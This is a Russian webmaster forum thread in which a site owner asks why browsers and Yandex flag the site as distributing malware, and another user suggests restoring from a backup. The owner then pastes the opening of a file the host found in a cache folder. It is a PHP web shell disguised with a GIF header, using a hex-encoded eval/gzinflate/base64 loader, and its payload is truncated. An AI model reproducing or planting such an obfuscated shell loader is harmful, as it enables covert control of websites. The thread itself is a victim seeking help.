Опасный сайт. Замечен в распространении

9

toegor

16 сентября 2011, 19:24

1599

Вот у ж не думал, что мой сайт будет приносить кому-то вред.. Со вчерашнего дня опера стала блочить мой сайт, при попытке входа на главную страницу выдают следующее:

Опасный сайт

Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.

Opera Software настоятельно не рекомендует посещать эту страницу.

Проверил на вирусы несколькими он-лайн ресурсами - вирусы не найдены. В панели яндекса указывает на наличие вредоносного кода на нескольких страницах, судя по характеру они выбраны случайно и проблема существует на всех страницах сайта.

Кроме шаблона установлены только кнопки соц сетей +1 гугл. Но стоят они давно.

Что проверять, с чего начать?

сайт - www.devis.com.ua

[Удален]

16 сентября 2011, 19:25

#1

Информация о потенциальной опасности сайта предоставлена Яндексом.

а вы смотрели какой код добавлен? просмотрите все файлы на хостинге. и лучше проверте бекап и залейте его на хостинг, при этом удалив всё до этого.

T

9

toegor

16 сентября 2011, 19:29

#2

Вот что написано в панели яндекса

страница - http://www.devis.com.ua/

дата - 14.09.2011

Вердикт - Поведенческий анализ

toegor добавил 17.09.2011 в 17:25

Заказал у хостера проверку на вредоносный код, найден один файл с папке с кешем. Вот начало кода: (только часть та как там кода на 23кб)

GIF89a����!�,D;

<?php

$auth_pass = "";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6e

Как можно узнать через что взломали и что этот код делает?

Антивирусный отдел Яндекса предупреждает Яндекс.Почта предупредит о ссылках В новом Search Console

Курс биткоина превысил $50 тысяч

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы